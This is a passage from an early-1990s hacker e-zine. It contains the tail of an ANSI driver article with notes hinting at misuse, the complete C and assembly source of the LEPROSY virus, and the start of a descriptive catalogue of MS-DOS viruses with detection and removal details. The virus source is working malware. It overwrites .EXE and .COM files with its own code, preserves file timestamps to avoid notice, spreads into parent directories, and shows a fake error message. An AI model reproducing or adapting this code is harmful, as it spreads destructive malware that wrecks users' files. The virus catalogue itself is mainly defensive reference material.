           that understands this type of hacking and ask for help.
           Furthermore I do not request anything (i.e. Money, Your first
           born or otherwise). If you have a guilty conscience about getting
           something for nothing THEN send a contribution to the AMERICAN
           CANCER SOCIETY. I'm certain that they can put it to better use
           than I would.
                                                                                                                                                                                                                                                                                                                    Using the ANSI driver, Page -6-
 
 
 
     To move the cursor to a specified horizontal and vertical position: ESC
     [#;#f where # means first the line number and secondly the column number.
 
     To get a device status report: ESC [6n
 
     To get a cursor position report: ESC [#;#r where the first # specifies
     the current line and the second # specifies the current column
 
     To move the cursor down: ESC [#b where # specifies the number of lines
     moved down.
 
     To move the cursor forward: ESC [#C where # specifies the number of
     columns moved.
 
     To move the cursor backward: ESC [#d where # specifies the number of
     columns moved.
 
     To save the cursor position: ESC [s and to restore it: ESC [u.
 
2. ERASING
 
     To do a CLS (erase screen move cursor to home position): ESC [2j
 
     To erase from cursor to end of line: ESC [k
 
 
3. COLOR GRAPHICS
 
     To set the color/graphics attributes, enter ESC [#;#m where the first #
     is the desired foreground color and the second is the desired background
     color.  Select colors from the list below:
 
     30  black foreground
     31  red foreground
     32  green foreground
     33  yellow foreground
     34  blue foreground
     35  magenta foreground
     36  cyan foreground
     37  white foreground
 
     40  black background
     41  red background
     42  green background
     43  yellow background
     44  blue background
     45  magenta background
     46  cyan background
     47  white background
 
     To set additional attributes enter: ESC [#m where # is the number of the
     desired attribute.  Select attributes from the list below:
 
     0  all attributes off (white on black)
 
 
 
 
 
 
 
 

                       Using the ANSI driver, Page -7-
 
 
     1  bold on
     4  underscore (on IBM Monochrome Display)
     5  blink
     7  reverse video
     8  invisible
 
To give an example of what can be done with these additional codes, a batch
file called MENUOFF.BAT containing only the line:
 
                        PROMPT $e[2J$e[30;40m$h
 
would blank a color display completely.  It does a CLS, sets the display to a
black foreground and background and the with the "$h" performs a backspace to
erase the blinking cursor (the "$h command is documented in the DOS manual
under PROMPT).  Another batch file called MENUON.BAT containing the lines:
 
      PROMPT $e[0m
      prompt
      cls
 
Would reset a color display to restore the screen after MENUOFF.BAT had been
run.
 
Enjoy ANSI!  It is a wonderful tool, and can be a lot of fun to use.  It's not
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [It IS a wonderful tool, especially in]
                                    [The Right (Wrong?) Hands]
a keyboard enhancer, and if you load it up with too many keyboard
redefinitions at one time you will run out of environment space.  This is
                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [Watch for]
                                   [This one, If it gives errors, The User]
                                   [Will be able to tell that ANSI commands]
                                   [Have been loaded]
harmless and simply means that ANSI is full.  But it will work fine to**************************
--------------------------------------
Phile 8:
Leprosy Source in Assembly
**************************

;  'Extra-Tiny' memory model startup code for Turbo C 2.0
;
;  This makes smaller executable images from C programs, by
;  removing code to get command line arguments and the like.
;  Compile with Tiny model flag, do not use any standard I/O
;  library functions, such as puts() or int86().
;
;  This code courtesey PC Magazine, December 26, 1989.
;  But nobody really needs to know that.


_text           segment byte public 'code'
_text           ends
_data           segment word public 'data'
_data           ends
_bss            segment word public 'bss'
_bss            ends

dgroup          group           _text, _data, _bss

_text           segment
                org 100h
begin:
_text           ends

                end     begin
=============================
Phile 9:
++*++*++*++*++*++*++*++*
Leprosy Source Code in C
++*++*++*++*++*++*+++*+*

/*  This file is part of the source code to the LEPROSY Virus 1.00
    Copy-ya-right (c) 1990 by PCM2.  This program can cause destruction
    of files; you're warned, the author assumes no responsibility
    for damage this program causes, incidental or otherwise.  This
    program is not intended for general distribution -- irresponsible
    users should not be allowed access to this program, or its
    accompanying files.  (Unlike people like us, of course...)
*/


#pragma inline

#define   CRLF       "\x17\x14"          /*  CR/LF combo encrypted.  */
#define   NO_MATCH   0x12                /*  No match in wildcard search.  */


/*  The following strings are not garbled; they are all encrypted  */
/*  using the simple technique of adding the integer value 10 to   */
/*  each character.  They are automatically decrypted by           */
/*  'print_s()', the function which sends the strings to 'stdout'  */
/*  using DOS service 09H.  All are terminated with a dollar-sign  */
/*  "$" as per DOS service specifications.                         */

char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
  {
    CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
    CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
    CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
  };



struct _dta                     /*  Disk Transfer Area format for find.  */
  {
    char findnext[21];
    char attribute;
    int timestamp;
    int datestamp;
    long filesize;
    char filename[13];
  } *dta = (struct _dta *) 0x80;   /*  Set it to default DTA.  */


const char filler[] = "XX";             /*  Pad file length to 666 bytes.  */
const char *codestart = (char *) 0x100;  /*  Memory where virus code begins.  */
const int virus_size = 666;      /*  The size in bytes of the virus code.  */
const int infection_rate = 4;     /*  How many files to infect per run.  */

char compare_buf[20];           /*  Load program here to test infection.  */
int handle;                     /*  The current file handle being used.  */
int datestamp, timestamp;       /*  Store original date and time here.  */
char diseased_count = 0;        /*  How many infected files found so far.  */
char success = 0;               /*  How many infected this run.  */


/*  The following are function prototypes, in keeping with ANSI    */
/*  Standard C, for the support functions of this program.         */

int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );



/*----------------------------------*/
/*     M A I N    P R O G R A M     */
/*----------------------------------*/

int main( void )  {
  int x = 0;
  do {
    if ( find_healthy() )  {           /*  Is there an un-infected file?  */
      infect();                        /*  Well, then infect it!  */
      x++;                             /*  Add one to the counter.  */
      success++;                       /*  Carve a notch in our belt.  */
    }
    else  {                            /*  If there ain't a file here... */
      _DX = (int) "..";                /*  See if we can step back to  */
      _AH = 0x3b;                      /*  the parent directory, and try  */
      asm   int 21H;                   /*  there.  */
      x++;                             /*  Increment the counter anyway, to  */
    }                                  /*  avoid infinite loops.  */
  } while( x < infection_rate );       /*  Do this until we've had enough.  */
  if ( success )                       /*  If we got something this time,  */
    print_s( fake_msg );               /*  feed 'em the phony error line.  */
  else
    if ( diseased_count > 6 )          /*  If we found 6+ infected files  */
      for( x = 0; x < 3; x++ )         /*  along the way, laugh!!  */
        print_s( virus_msg[x] );
    else
      print_s( fake_msg );             /*  Otherwise, keep a low profile.  */
  return;
}


void infect( void )  {
  _DX = (int) dta->filename;  /*  DX register points to filename.  */
  _CX = 0x00;                 /*  No attribute flags are set.  */
  _AL = 0x01;                 /*  Use Set Attribute sub-function.  */
  _AH = 0x43;                 /*  Assure access to write file.  */
  asm   int 21H;              /*  Call DOS interrupt.  */
  open_handle( dta->filename );        /*  Re-open the healthy file.  */
  _BX = handle;                       /*  BX register holds handle.  */
  _CX = virus_size;                   /*  Number of bytes to write.  */
  _DX = (int) codestart;              /*  Write program code.  */
  _AH = 0x40;                         /*  Set up and call DOS.  */
  asm   int 21H;
  restore_timestamp();               /*  Keep original date & time.  */
  close_handle();                     /*  Close file.  */
  return;
}


int find_healthy( void )  {
  if ( find_first("*.EXE") != NO_MATCH )       /*  Find EXE?  */
    if ( healthy() )                         /*  If it's healthy, OK!  */
      return 1;
    else
      while ( find_next() != NO_MATCH )      /*  Try a few more otherwise. */
        if ( healthy() )
          return 1;                          /*  If you find one, great!  */
  if ( find_first("*.COM") != NO_MATCH )       /*  Find COM?  */
    if ( healthy() )                         /*  If it's healthy, OK!  */
      return 1;
    else
      while ( find_next() != NO_MATCH )      /*  Try a few more otherwise. */
        if ( healthy() )
          return 1;                          /*  If you find one, great!  */
  return 0;                                  /*  Otherwise, say so.  */
}



int healthy( void )  {
  int i;
  datestamp = dta->datestamp;        /*  Save time & date for later.  */
  timestamp = dta->timestamp;
  open_handle( dta->filename );      /*  Open last file located.  */
  _BX = handle;                      /*  BX holds current file handle.  */
  _CX = 20;                          /*  We only want a few bytes.  */
  _DX = (int) compare_buf;          /*  DX points to the scratch buffer.  */
  _AH = 0x3f;                       /*  Read in file for comparison.  */
  asm   int 21H;
  restore_timestamp();              /*  Keep original date & time.  */
  close_handle();                   /*  Close the file.  */
  for ( i = 0; i < 20; i++ )        /*  Compare to virus code.  */
    if ( compare_buf[i] != *(codestart+i) )
      return 1;                     /*  If no match, return healthy.  */
  diseased_count++;                 /*  Chalk up one more fucked file.  */
  return 0;                         /*  Otherwise, return infected.  */
}


void restore_timestamp( void )  {
  _AL = 0x01;                         /*  Keep original date & time.  */
  _BX = handle;                       /*  Same file handle.  */
  _CX = timestamp;                    /*  Get time & date from DTA.  */
  _DX = datestamp;
  _AH = 0x57;                         /*  Do DOS service.  */
  asm   int 21H;
  return;
}


void print_s( char *s )  {
  char *p = s;
  while ( *p )  {              /*  Subtract 10 from every character.  */
    *p -= 10;
    p++;
  }
  _DX = (int) s;              /*  Set DX to point to adjusted string.   */
  _AH = 0x09;                 /*  Set DOS function number.  */
  asm   int 21H;              /*  Call DOS interrupt.  */
  return;
}


int find_first( char *fn )  {
  _DX = (int) fn;             /*  Point DX to the file name.  */
  _CX = 0xff;                 /*  Search for all attributes.  */
  _AH = 0x4e;                 /*  'Find first' DOS service.  */
  asm   int 21H;              /*  Go, DOS, go.  */
  return _AX;                 /*  Return possible error code.  */
}


int find_next( void )  {
  _AH = 0x4f;                 /*  'Find next' function.  */
  asm   int 21H;              /*  Call DOS.  */
  return _AX;                 /*  Return any error code.  */
}


void open_handle( char *fn )  {
  _DX = (int) fn;             /*  Point DX to the filename.  */
  _AL = 0x02;                 /*  Always open for both read & write. */
  _AH = 0x3d;                 /*  "Open handle" service.  */
  asm   int 21H;              /*  Call DOS.  */
  handle = _AX;               /*  Assume handle returned OK.  */
  return;
}


void close_handle( void )  {
  _BX = handle;               /*  Load BX register w/current file handle.  */
  _AH = 0x3e;                 /*  Set up and call DOS service.  */
  asm   int 21H;
  return;
}




   ܰ  ܰ     Date Of Listing:  October 10, 1991
   ۰   ۰۰     Written By Dr. C
   ۰        ۰    ۰
   ۰        ۰    ۰
   ۰        ۰    ۰
   ۰        ۰     Corrupt Programming
   ۰        ۰      Copyright (c) 1991 By GCA & Dr. C
   ۰        ۰
   ۰        ۰           [CP.TXT] - HapiphaX Article
   ۰        ۰
   ۰  ۰
      



                    Copyright (C) 1991-1992 by Dr. C

     This article contains the compiled information from my continuing
 research effort into the identification, detection, and implementation
 of MS-DOS Computer Viruses. It is not intended to provide a very detailed
 technical description, but is should help the reader to understand what a
 virus generally does, how it activates, what it is doing to their system,
 and most importantly, how to get rid of it.  The implementation is up to
 you.

     The reader of this article needs to keep in mind that the information
 provided is up-to-date ONLY to the date of the listing itself.  If the
 listing is one month old, some items may not be accurate. Lastly, as new
 variants of known viruses are isolated, some of the characteristics of the
 variant may be different.



                              TABLE OF CONTENTS

   I.  Introduction.

  II.  Virus Information Listing.

 III.  Cross-Reference of Common Names for MS-DOS viruses.

  IV.  Chart showing viral relationships between various viruses and variants.

   V.  Personal Observations.
       A. The All Powerful Ansi-Bomb

     Special thanks go to iNVALiD MEDiA for putting up with my shit and for
     discovering the Rape-11 virus.

                                          - Dr. C / GCA / HaliphaX



PART I.  Introduction & Entry Format

     Each of the entries in the list consists of several fields.
 Below is a brief description of what is indicated in each of the
 fields.  For fields where codes may appear, the meaning of each
 code in indicated.

 Virus Name: Field contains one of the more common names for the
             virus.  The listing is alphabetized based on this
             field.
 Aliases:    Other names that the same virus may be referred to by.
             These names are aliases or A.K.A.'s.
 V Status:   This field contains one of the following values which indicate
             how common the virus is in the public domain.
             Common: The virus is one of the most common viruses reported to
                  various groups which gather virus infection statistics.
                  Most of these groups are in the United States.  Where a
                  virus has had many reports from a specific geographic area,
                  the V Status field will contain "Common - xxxxxxxxx" where
                  xxxxxxxxx is an indicator of geographic location.
             Endangered: The "Endangered" classification of viruses are
                  viruses that are very uncommon and were fairly recently
                  discovered or isolated.  Due to some characteristics of
                  these viruses, it is highly unlikely that they will ever
                  become a widespread problem.  It doesn't mean that they
                  don't exist, just that the probability of someone getting
                  these viruses is fairly low.
             Extinct: The "Extinct" classification is for viruses which at
                  one time may have been widespread (ie. they are not a
                  research virus which was never released into the public
                  domain), but have not had a reported infection in at least
                  one year.  "Extinct" viruses will also include "viruses"
                  which were submitted which actually don't replicate due to
                  a flaw in their viral code, but if the flaw were corrected
                  they might be successful.  It is still possible that someone
                  could become infected with one of these viruses, but the
                  probability is extremely low.
             Myth: "Myth" viruses are viruses which have been discussed among
                  various groups for some time (in excess of one year), but are
                  not known to actually exist as either a public domain or
                  research virus.  Probably the best case of a "Myth" virus
                  is the Nichols Virus.
             Rare: "Rare" viruses are viruses which were recently (within the
                  last year) isolated but which do not appear to be widespread.
                  These viruses, as a general rule, will be viruses which
                  have characteristics that would make them a possible
                  future problem.  "Rare" viruses have a higher probability
                  of someone becoming infected than Endangered or Extinct
                  viruses, but are much less likely to be found than a
                  "Common" virus.
             Research: A "Research" virus is a virus which was originally
                  received by at least one anti-viral researcher directly
                  from its source or author.  These viruses are not known
                  to have been released into the public domain, so they are
                  highly unlikely to be detected on computer systems other
                  than researchers.
             Rumored: The "Rumored" virus classification are for viruses
                  which the author has received information about, but that
                  no sample of the virus has been made available for analysis.
                  Any viruses in this classification should be considered with
                  a grain of salt, they may not actually exist.
             Unknown: The "Unknown" classification is for those viruses where
                  the original submission of the virus to anti-viral researchers
                  is suspect for any number of reasons, or that there is
                  very little information known about the origin of the
                  virus.
             New: The "New" category is for viruses which were recently
                  received by the author but cannot at the present time be
                  researched in depth.  Instead of leaving these viruses out
                  of the listing all together, they will be listed but with
                  a "New" status.
 Discovery:  First recorded discovery date.
 Origin:     Author/country of origin
 Symptoms:   Changes to system that may be noticed by users: messages,
             growth in files, TSRs/ Resident TOM (change in CHKDSK 
             return), BSC - boot sector change (may require cold boot 
             from known-good protected floppy to find), corruption of
             system or files, frequent re-boots, slowdowns.
 Origin:     Either credited or assumed to be in country of discovery.
 Eff Length: The length of the viral code after it has infected
             a program or system component.  For boot-sector infectors,
             the length is indicated as N/A, for not applicable.
 Type Code:  The type codes indicated for a virus indicate general
             behavior characteristics.  Following the type code(s) is
             a brief text description.  The type codes used are:
             A = Infects all program files (COM & EXE)
             B = Boot virus
             C = Infects COM files only
             D = Infects DOS boot sector on hard disk
             E = Infects EXE files only
             F = Floppy (360K) only
             K = Infects COMMAND.COM
             M = Infects Master boot sector on hard disk
             N = Non-resident (in memory)
             O = Overwriting virus
             P = Parasitic virus
             R = Resident (in memory)
               (below 640k - segment A000)
                 a - in unused portion of allocated memory
                     (does not change free memory, such as virus resident
                      in CLI stack space or unused system memory)
                     Example: LeHigh
                 f - in free (user) memory below TOM
                     (does not prevent overwriting)
                     Example: Icelandic
                 h - in high memory but below TOM
                     (Resides in high system memory, right below TOM.
                     Memory is allocated so it won't be accidently
                     overwritten.)
                     Example: Flash
                 s - in low (system/TSR) memory
                     (reduces free memory, typically uses a normal
                     Int 21/Int 28 TSR)
                     Example: Jerusalem
                 t - above TOM but below 640k (moves Int 12 return)
                     (Reduces total memory size and free memory)
                     Example: Pakistani Brain
               (above 640k)
                 b - in BIOS/Video/Shadow RAM area (segment A000 - FFFF)
                 e - in extended/expanded memory (above 1 Meg)
             S = Spawning or companion file virus
                 (This type of virus creates another file on the disk which
                 contains the actual viral code.  Example: Aids II)
             T = Manipulation of the File Allocation Table (FAT)
             X = Manipulation/Infection of the Partition Table
 Detection Method:
             This entry indicates how to determine if a program or
             system has been infected by the virus.  Where the virus
             can be detected with a shareware, public domain, or
             readily available commercial program, it is indicated.
             Note that a "+" after the anti-viral product's version number
             indicates that versions of the product from the indicated version
             forward are applicable.
             Programs referenced in the listing are:
             AVTK      - Dr. Solomon's Anti-Virus Toolkit <commercial>
             F-PROT    - Fridrik Skulason's F-Prot detector/disinfector
             IBM Scan  - IBM's Virus Scanning Program <commercial>
             Pro-Scan  - McAfee Associates' Pro-Scan Program <commercial>
             VirexPC   - MicroCom's VirexPC Program <commercial>
             VirHunt   - Digital Dispatch Inc's VirHunt Program <commercial>
             ViruScan  - McAfee Associates' ViruScan Program
             ViruScan/X- McAfee Associates' ViruScan Program with /X switch
 Removal Instructions:
             Brief instructions on how to remove the virus.  Where
             a shareware, public domain, or readily available
             commercial program is available which will remove the
             virus, it is indicated.
             Programs referenced in the listing are:
             AntiCrim  - Jan Terpstra's AntiCrime program
             CleanUp  -  John McAfee's CleanUp universal virus
                         disinfector.
                         Note: CleanUp is only indicated for a virus
                         if it will disinfect the file, rather than
                         delete the infected file.
             DOS COPY  - Use the DOS COPY command to copy files from
                         infected non-bootable disks to newly formatted,
                         uninfected disks.  Note: do NOT use the
                         DOS DISKCOPY command on boot sector infected
                         disks, or the new disk will also be infected!
             DOS SYS   - Use the DOS SYS command to overwrite the boot
                         sector on infected hard disks or diskettes.
                         Be sure you power down the system first, and
                         boot from a write protected master diskette,
                         or the SYS command will copy the infected
                         boot sector.
             F-PROT    - Fridrik Skulason's F-Prot detector/disinfector,
                         Version 1.07.
             M-3066    - Traceback virus disinfector.
             MDisk     - MD Boot Virus Disinfector.  Be sure to use the
                         program which corresponds to your DOS release.
             Pro-Scan  - Pro-Scan Virus Identifier/Disinfector <Commercial>.
             Saturday  - European generic Jerusalem virus disinfector.
             Scan/D    - ViruScan run with the /D option.
             Scan/D/A  - ViruScan run with the /D /A options.
             Scan/D/X  - ViruScan run with the /D /X options.
             UnVirus   - Yuval Rakavy's disinfector for Brain, Jerusalem,
                         Ping Pong, Ping Pong-B, Typo Boot, Suriv 1.01,
                         Suriv 2.01, and Suriv 3.00 viruses.
             VirexPC   - MicroCom's VirexPC Detector/Disinfector
                         Note: VirexPC is only indicated if it will actually
                         disinfect the virus, not just delete the infected
                         file.
             VirHunt   - Digital Dispatch Inc's VirHunt Detector/Disinfector
                         Note: VirHunt is only indicated if it will actually
                         disinfect the virus on all major variants.
             Virus Buster - Yuval Tal's Virus Buster Detector/Disinfector
 General Comments:
             This field includes other information about the virus,
             including but not limited to: historical information,
             possible origin, possible damage the virus may cause,
             and activation criteria.


-------------------------------------------------------------------------------

PART II. MS-DOS Virus Information


 Virus Name:  382 Recovery Virus
 Aliases:     382
 V Status:    Rare
 Discovery:   July, 1990
 Symptoms:    first 382 bytes of .COM files overwritten, system hangs,
              spurious characters on system display, disk drive spinning
 Origin:      Taiwan
 Eff Length:  N/A
 Type Code:   ONAK - Overwriting Non-Resident .COM & .EXE Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The 382 Recovery Virus was isolated in July 1990 in Taiwan.  It is
       a non-resident generic infector of .COM and .EXE files, including
       COMMAND.COM.

       Each time a program infected with the 382 Recovery Virus is executed,
       the virus will check the current directory for a .COM files that has
       not been infected with the virus.  If it finds an uninfected .COM
       file, it will infect it.  If the original file was less than 382 bytes
       in length, the infected file will now be 382 bytes in length.  Files
       which were originally greater than 382 bytes in length will not show
       any increase in length.  Infected files always have the first 382
       bytes of the file overwritten to contain the virus's code.

       Once all .COM files in the current directory are infected, the next
       time an infected .COM file is executed the virus will rename all .EXE
       files to .COM files.  These renamed files, however, may or may not
       later become infected.

       Symptoms of the 382 Recovery Virus being present on a file are that
       the program will not execute properly.  In some cases, the program will
       hang upon execution requiring the system to be rebooted.  In other
       cases, spurious characters will appear on the system display and the
       program will not run.  Lastly, the system may do nothing but leave the
       disk drive spinning, requiring the system to be powered off and
       rebooted.

       Since the first 382 bytes of infected files have been overwritten,
       the infected files cannot be recovered.  The original 382 bytes of
       the file are permanently lost.  Infected files should be deleted or
       erased and replaced with backup copies known to be free of infection.


 Virus Name:  405
 Aliases:
 V Status:    Extinct
 Discovery:   1987
 Symptoms:    .COM files fail to run, first 405 bytes of .COM files
              overwritten
 Origin:      Austria or Germany
 Eff Length:  N/A
 Type Code:   ONC - Overwriting Non-Resident .COM Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan 1.4+,
              VirexPC 1.1+, VirHunt 2.0+
 Removal Instructions: Scan/D/X, F-Prot, or delete infected files
 General Comments:
       The 405 virus is an overwriting virus which infects only .COM
       files in the current directory.  If the length of the .COM file
       was originally less than 405 bytes, the resulting infected file
       will have a length of 405 bytes.  This virus currently cannot
       recognize .COM files that are already infected, so it will
       attempt to infect them again.

       The 405 Virus doesn't carry an activation date, and doesn't do
       anything but replicate in the current directory.  However, since
       it overwrites the first 405 bytes of .COM files, infected files
       are not recoverable except by replacing them from uninfected
       backups or master distribution disks.


 Virus Name:  512
 Aliases:     512-A, Number of the Beast Virus, Stealth Virus
 V Status:    Rare
 Discovery:   November, 1989
 Origin:      Bulgaria
 Symptoms:    Program crashes, system hangs, TSR.
 Eff Length:  512 Bytes
 Type Code:   PRCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V58+, VirexPC 1.1+
 Removal Instructions: CleanUp V58+
 General Comments:
       The 512 virus is not the same as the Original Friday The 13th COM
       virus.  The 512 virus was originally isolated in Bulgaria in
       November, 1989, by Vesselin Bontchev.  It infects .COM files,
       including COMMAND.COM, installing itself memory resident when the
       first infected program is run.  After becoming memory resident, any
       .COM file openned for any reason will become infected if its
       uninfected length is at least 512 bytes.

       Systems infected with the 512 virus may experience program crashes
       due to unexpected errors, as well as system hangs.  Damage may occur
       to infected files if the system user runs CHKDSK with the /F
       parameter as the length of the program in the directory entry will not
       match the actual disk space used.  CHKDSK will then adjust the file
       allocation resulting in damaged files.

       The virus's alias of "Number of the Beast" Virus is because the
       author of the virus used a signature of text 666 near the end of the
       virus to determine if the file is already infected.  Since 512 adds
       its viral code to the end of infected files, it is easy to verify
       that a file is infected by the 512 virus by checking for this
       signature.

       Known variant(s) of the 512 Virus are:
       512-B : Similar to the 512 Variant, except that the DOS version check
               in the original virus has been omitted.  The author's
               signature of '666' has been omitted.
       512-C : Similar to the 512-B Variant, minor code changes.
       512-D : Similar to the 512-C Variant, except that the virus no longer
               checks to see if a file has the System Attribute on it before
               infecting it.

 
 Virus Name:  646
 Aliases:     Vienna C
 V Status:    Rare
 Discovery:   October, 1990
 Symptoms:    COMMAND.COM & .COM growth
 Origin:      Unknown
 Eff Length:  646 Bytes
 Type Code:   PNCK - Parasitic Non-Resident COM Infector
 Detection Method:  ViruScan V71+, Pro-Scan 2.01+
 Removal Instructions: Pro-Scan 2.01+, Scan/D, or Delete infected files
 General Comments:
       The 646 Virus was discovered in October, 1990.  Its origin is unknown.
       This virus is a non-resident infector of .COM files, including
       COMMAND.COM.

       When a file infected with the 646 Virus is executed, the virus will
       infect one other .COM file in the current directory.  Infected files
       will increase in size by 646 bytes, with the virus being located at
       the end of the infected file.

       Infected files can be easily identified as they will always end with
       the hex string: "EAF0FFFFFF".

       This virus appears to do nothing except replicate.


 Virus Name:  903
 Aliases:
 V Status:    New
 Discovery:   January, 1991
 Symptoms:    .COM file growth; TSR; System hangs
 Origin:      France
 Eff Length:  903 Bytes
 Type Code:   PRsCK - Parasitic Resident COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The 903 Virus was discovered France in January, 1991.  This virus is
       not a particularly viable virus since replicated samples will not
       further replicate.  It is possible that the original sample is
       corrupted.  This virus infects .COM program, including COMMAND.COM.

       When the original sample of 903 is executed, this virus will install
       itself memory resident as a 1,216 byte low system memory TSR.  It will
       hook interrupt 21.  At that time, it will infect COMMAND.COM, adding
       903 bytes to the beginning of the program.  The following message is
       then displayed:

               "Fichier introuvable"

       Once memory resident, this virus will infect up to three .COM programs
       in the current directory if the original sample is again executed.
       Later execution of infected files (other than the original) will not
       result in the virus spreading to other files.  The virus will also
       infect files when the DOS Copy command is used, but only if the source
       and target files are in the current directory.

       Infected .COM programs will have a file size increase of 903 bytes,
       the virus will be located at the beginning of the infected program.
       The file date and time in the disk directory will not be altered by
       the virus.

       If 903 becomes memory resident from other than the original sample, it
       will not replicate to other .COM programs.  The "Fichier introuvable"
       message is not displayed with other than the original sample.

       Some programs may hang when they are executed on infected systems.

       It is unknown if 903 does anything destructive.


 Virus Name:  1008
 Aliases:     Suomi, Oulu
 V Status:    Rare
 Discovery:   June, 1990
 Symptoms:    COMMAND.COM growth, Internal Stack Errors,
              System Halt on Boot
 Origin:      Helsinki, Finland
 Eff Length:  1,008 Bytes
 Type Code:   PRCK - Parasitic Resident COM Infector
 Detection Method:  ViruScan V64+, F-Prot 1.12+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, F-Prot 1.12+, Pro-Scan 2.01+,
              or delete infected files
 General Comments:
       The 1008 Virus was discovered in June, 1990 by Petteri Jarvinen of
       Helsinki, Finland.  It is a memory resident .COM infector, and will
       infect COMMAND.COM.  This virus is also sometimes referred to as
       the Suomi Virus.

       The first time a program infected with the 1008 virus is executed,
       the virus will install itself memory resident.  COMMAND.COM is also
       infected at this time, resulting in its length increasing by 1,008
       Bytes.  The increase in file size of COMMAND.COM cannot be seen by
       doing a directory listing if the virus is present in memory.

       Booting a system with an infected copy of COMMAND.COM may result in
       an internal stack error, and the system being halted.  This effect
       was noted on the author's test machine which is a 640K XT-clone
       running Microsoft MS-DOS Version 3.30.

       After the virus is memory resident, it will infect any .COM file which
       is executed, adding 1,008 bytes to the file length.  The file length
       increase cannot be seen by doing a directory listing if the virus is
       present in memory.


 Virus Name:  1210
 Aliases:     Prudents Virus
 V Status:    Rare
 Discovery:   December, 1989
 Symptoms:    .EXE growth, disk write failure, TSR
 Origin:      Spain
 Eff Length:  1,210 Bytes
 Type Code:   PRE - Parasitic Resident .EXE Infector
 Detection Method:  ViruScan V61+, Pro-Scan 1.4+, F-Prot 1.12+, VirHunt 2.0+
 Removal Instructions: Scan/D, F-Prot 1.12+, VirHunt 2.0+,
              or delete infected files
 General Comments:
       The 1210, or Prudents Virus, was first isolated in Barcelona, Spain,
       in December 1989.  The 1210 is a memory resident virus, infecting
       .EXE files when they are executed.

       This virus activates between May 1st and May 4th of any year,
       causing disk writes to be changed to disk verifies, so writes to
       the disk never occur between these dates.
 

 Virus Name:  1226
 Aliases:     V1226
 V Status:    Rare
 Discovery:   July 1990
 Symptoms:    .COM growth, decrease in system and free memory, system hangs,
              spurious characters displayed in place of program executing,
              disk drive spinning
 Origin:      Bulgaria
 Eff Length:  1,226 Bytes
 Type Code:   PRhC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The 1226 Virus was isolated in Bulgaria in July 1990 by Vesselin
       Bontchev.  This virus is a memory resident generic .COM infector,
       though it does not infect COMMAND.COM.  The 1226 Virus is a self-
       encrypting virus, and simple search string algorithms will not work
       to detect its presence on a system.

       The first time a program infected with the 1226 virus is executed,
       the virus will install itself memory resident, reserving 8,192 bytes
       of memory at the top of free memory.  Interrupt 2A will be hooked.

       Once 1226 is memory resident, the virus will attempt to infect any
       .COM file that is executed that is at least 1,226 bytes in length
       before infection.  The virus is rather "buggy" and the infection
       process is not always entirely successful.  Successfully infected
       files will increase in length by 1,226 bytes.

       This virus will infect .COM files multiple times, it is unable to
       determine that the file is already infected.  Each time the file
       is infected it will grow in length by another 1,226 bytes.  Eventually,
       the .COM files will grow too large to fit into memory.

       Systems infected with the 1226 virus may experience unexpected system
       hangs when attempting to execute programs.  Another affect is that
       instead of a program executing, a line or two of spurious characters
       will appear on the system display.  Lastly, infected systems will always
       indicate that they have 8,192 less bytes of total system and free
       memory available than is actually on the machine.

       There are two later versions of this virus, 1226D and 1226M, which are
       much better replicators than the original 1226 virus.  These two
       variants are documented as 1226D in this document due to their
       different characteristics.

       Also see: 1226D


 Virus Name:  1226D
 Aliases:     V1226D
 V Status:    Rare
 Discovery:   July 1990
 Symptoms:    .COM growth, decrease in system and free memory
 Origin:      Bulgaria
 Eff Length:  1,226 Bytes
 Type Code:   PRhC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The 1226D Virus was isolated in Bulgaria in July 1990 by Vesselin
       Bontchev.  This virus is a memory resident generic .COM infector,
       though it does not infect COMMAND.COM.  The 1226D Virus is a self-
       encrypting virus, and simple search string algorithms will not work
       to detect its presence on a system.

       The 1226D Virus is based on the 1226 Virus, in fact it is a decrypted
       version of the 1226 Virus.  It is a better replicator, infecting
       successfully on file opens as well as when .COM files are executed.

       The first time a program infected with the 1226 virus is executed,
       the virus will install itself memory resident, reserving 8,192 bytes
       of memory at the top of free memory.  Total system and free memory
       are decreased by 8,192 bytes.  Interrupt 2A will be hooked.

       Once 1226 is memory resident, the virus will attempt to infect any
       .COM file that is executed that is at least 1,226 bytes in length
       before infection.  Infected files will increase in length by 1,226
       bytes.  As with the original 1226 Virus, a .COM file may be infected
       multiple times by the 1226D Virus as the virus is unable to determine
       that the file was previously infected.  Each infection will result in
       another 1,226 bytes being added to the infected file's length.
       Eventually, the .COM files will grow too large to fit into memory.

       In addition to infecting .COM files when they are executed, the 1226D
       Virus will infect .COM files with a length of at least 1,226 bytes
       when they are openned for any reason.  The simple act of copying a
       .COM file with the virus memory resident will result in both the
       source and target files being infected.

       Unlike the 1226 Virus, systems infected with the 1226D virus will not
       experience the system hangs or spurious characters symptomatic of the
       1226 virus.  Infected system will still indicate that they have 8,192
       bytes less of total system memory than is installed on the machine.

       Known variant(s) of 1226D are:
       1226M/V1226M : Similar to the 1226D virus, except that files are not
                 infected on file open, only when they are executed.

       Also see: 1226

 
 Virus Name:  1253
 Aliases:     AntiCad, V-1
 V Status:    Rare
 Discovery:   August, 1990
